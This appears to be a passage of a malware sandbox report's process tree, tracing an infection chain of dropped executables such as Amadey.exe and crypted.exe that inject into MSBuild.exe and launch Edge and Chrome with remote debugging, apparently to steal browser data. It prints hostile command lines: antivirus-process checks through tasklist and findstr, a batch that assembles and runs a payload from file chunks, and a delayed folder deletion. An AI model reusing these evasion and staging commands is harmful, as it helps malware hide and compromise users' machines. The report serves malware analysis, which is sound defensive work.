                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2b0,0x7ff8c806f208,0x7ff8c806f214,0x7ff8c806f220
                                                                          11⤵
                                                                            PID:3236
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1848,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3
                                                                            11⤵
                                                                              PID:4444
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2172,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=2168 /prefetch:2
                                                                              11⤵
                                                                                PID:2260
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2528,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=2712 /prefetch:8
                                                                                11⤵
                                                                                  PID:3168
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3472,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:1
                                                                                  11⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:5448
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3492,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:1
                                                                                  11⤵
                                                                                  • Uses browser remote debugging
                                                                                  PID:548
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5236,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=5296 /prefetch:8
                                                                                  11⤵
                                                                                    PID:4664
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5232,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=5320 /prefetch:8
                                                                                    11⤵
                                                                                      PID:4556
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5696,i,9482335374978990092,7415510844180558427,262144 --variations-seed-version --mojo-platform-channel-handle=5704 /prefetch:8
                                                                                      11⤵
                                                                                        PID:4548
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                      10⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:6056
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                      10⤵
                                                                                      • Uses browser remote debugging
                                                                                      • Checks processor information in registry
                                                                                      • Enumerates system info in registry
                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                      PID:1924
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2ac,0x7ff8c8d8f208,0x7ff8c8d8f214,0x7ff8c8d8f220
                                                                                        11⤵
                                                                                          PID:2440
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2052,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:2
                                                                                          11⤵
                                                                                            PID:6212
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1728,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=2096 /prefetch:3
                                                                                            11⤵
                                                                                              PID:6228
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2496,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=2652 /prefetch:8
                                                                                              11⤵
                                                                                                PID:6304
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:1
                                                                                                11⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:4720
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3468,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
                                                                                                11⤵
                                                                                                • Uses browser remote debugging
                                                                                                PID:3356
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4668,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=5072 /prefetch:8
                                                                                                11⤵
                                                                                                  PID:4304
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4664,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=5092 /prefetch:8
                                                                                                  11⤵
                                                                                                    PID:6536
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5064,i,11066578728689828154,15266822345346334515,262144 --variations-seed-version --mojo-platform-channel-handle=5428 /prefetch:8
                                                                                                    11⤵
                                                                                                      PID:4684
                                                                                                  • C:\ProgramData\ec2v37y5fu.exe
                                                                                                    "C:\ProgramData\ec2v37y5fu.exe"
                                                                                                    10⤵
                                                                                                      PID:6352
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                        11⤵
                                                                                                          PID:5684
                                                                                                      • C:\ProgramData\u3wt00hvk6.exe
                                                                                                        "C:\ProgramData\u3wt00hvk6.exe"
                                                                                                        10⤵
                                                                                                          PID:5768
                                                                                                          • C:\ProgramData\u3wt00hvk6.exe
                                                                                                            "C:\ProgramData\u3wt00hvk6.exe"
                                                                                                            11⤵
                                                                                                              PID:5696
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                12⤵
                                                                                                                  PID:6276
                                                                                                                • C:\Users\Admin\AppData\Local\VnWh6CU8C84G.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\VnWh6CU8C84G.exe"
                                                                                                                  12⤵
                                                                                                                    PID:25468
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                      13⤵
                                                                                                                        PID:25508
                                                                                                                    • C:\Users\Admin\AppData\Local\LbHT8dDbmH9H.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\LbHT8dDbmH9H.exe"
                                                                                                                      12⤵
                                                                                                                        PID:18948
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                          13⤵
                                                                                                                            PID:19064
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                              14⤵
                                                                                                                              • Uses browser remote debugging
                                                                                                                              PID:37864
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ff8d122dcf8,0x7ff8d122dd04,0x7ff8d122dd10
                                                                                                                                15⤵
                                                                                                                                  PID:6332
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2380,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2376 /prefetch:2
                                                                                                                                  15⤵
                                                                                                                                    PID:37332
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1568,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2416 /prefetch:3
                                                                                                                                    15⤵
                                                                                                                                      PID:37320
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2080,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2384 /prefetch:8
                                                                                                                                      15⤵
                                                                                                                                        PID:37316
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3292 /prefetch:1
                                                                                                                                        15⤵
                                                                                                                                        • Uses browser remote debugging
                                                                                                                                        PID:37280
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3236 /prefetch:1
                                                                                                                                        15⤵
                                                                                                                                        • Uses browser remote debugging
                                                                                                                                        PID:37292
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3932,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3948 /prefetch:2
                                                                                                                                        15⤵
                                                                                                                                        • Uses browser remote debugging
                                                                                                                                        PID:37216
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4448,i,288668959391273900,11031321907195467619,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4412 /prefetch:1
                                                                                                                                        15⤵
                                                                                                                                        • Uses browser remote debugging
                                                                                                                                        PID:36096
                                                                                                                                • C:\Users\Admin\AppData\Local\6kTicgxQznbR.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\6kTicgxQznbR.exe"
                                                                                                                                  12⤵
                                                                                                                                    PID:19436
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\oLiIppxT\pcBPDzBDPDaZfrD7.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\oLiIppxT\pcBPDzBDPDaZfrD7.exe 0
                                                                                                                                      13⤵
                                                                                                                                        PID:25368
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\oLiIppxT\drisxg22eTbKb0jV.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\oLiIppxT\drisxg22eTbKb0jV.exe 25368
                                                                                                                                          14⤵
                                                                                                                                            PID:18016
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 25368 -s 688
                                                                                                                                            14⤵
                                                                                                                                            • Program crash
                                                                                                                                            PID:27796
                                                                                                                                  • C:\ProgramData\s00z58g4wt.exe
                                                                                                                                    "C:\ProgramData\s00z58g4wt.exe"
                                                                                                                                    10⤵
                                                                                                                                      PID:644
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\PdxWM4xU\IaUVbBF4DrdN3I5R.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\PdxWM4xU\IaUVbBF4DrdN3I5R.exe 0
                                                                                                                                        11⤵
                                                                                                                                          PID:2612
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\PdxWM4xU\RMnfRdA3YGBlmUMr.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\PdxWM4xU\RMnfRdA3YGBlmUMr.exe 2612
                                                                                                                                            12⤵
                                                                                                                                              PID:6944
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 1272
                                                                                                                                                13⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:25404
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 1084
                                                                                                                                              12⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:18104
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\zctrq" & exit
                                                                                                                                          10⤵
                                                                                                                                            PID:16932
                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                              timeout /t 11
                                                                                                                                              11⤵
                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                              PID:18268
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:2688
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                          9⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:740
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:2160
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                          9⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:5448
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10046340101\c8993dd17a.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10046340101\c8993dd17a.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:5320
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
                                                                                                                                          9⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:2096
                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                            tasklist
                                                                                                                                            10⤵
                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:3552
                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                            findstr /I "opssvc wrsa"
                                                                                                                                            10⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:6428
                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                            tasklist
                                                                                                                                            10⤵
                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:4292
                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                            findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                                                            10⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:4176
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /c md 674187
                                                                                                                                            10⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:7068
                                                                                                                                          • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                            extrac32 /Y /E Funky.wbk
                                                                                                                                            10⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:6384
                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                            findstr /V "Und" Tournament
                                                                                                                                            10⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:6200
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com
                                                                                                                                            10⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:6224
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r
                                                                                                                                            10⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:6256
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\674187\Constraints.com
                                                                                                                                            Constraints.com r
                                                                                                                                            10⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                            PID:3220
                                                                                                                                          • C:\Windows\SysWOW64\choice.exe
                                                                                                                                            choice /d y /t 5
                                                                                                                                            10⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:6800
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:1284
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                          9⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:3080
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10050360101\Amadey.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10050360101\Amadey.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Drops file in Windows directory
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:6516
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe"
                                                                                                                                          9⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:6844
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10051520101\abd9625a86.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10051520101\abd9625a86.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:6924
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10051520101\abd9625a86.exe"
                                                                                                                                          9⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:6340
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10051530101\eb5f738682.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10051530101\eb5f738682.exe"
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:448
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10051530101\eb5f738682.exe"
                                                                                                                                          9⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:2180
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10451860101\trOUuPI.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10451860101\trOUuPI.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:5928
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                      7⤵
                                                                                                                                        PID:4316
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:3240
                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                          7⤵
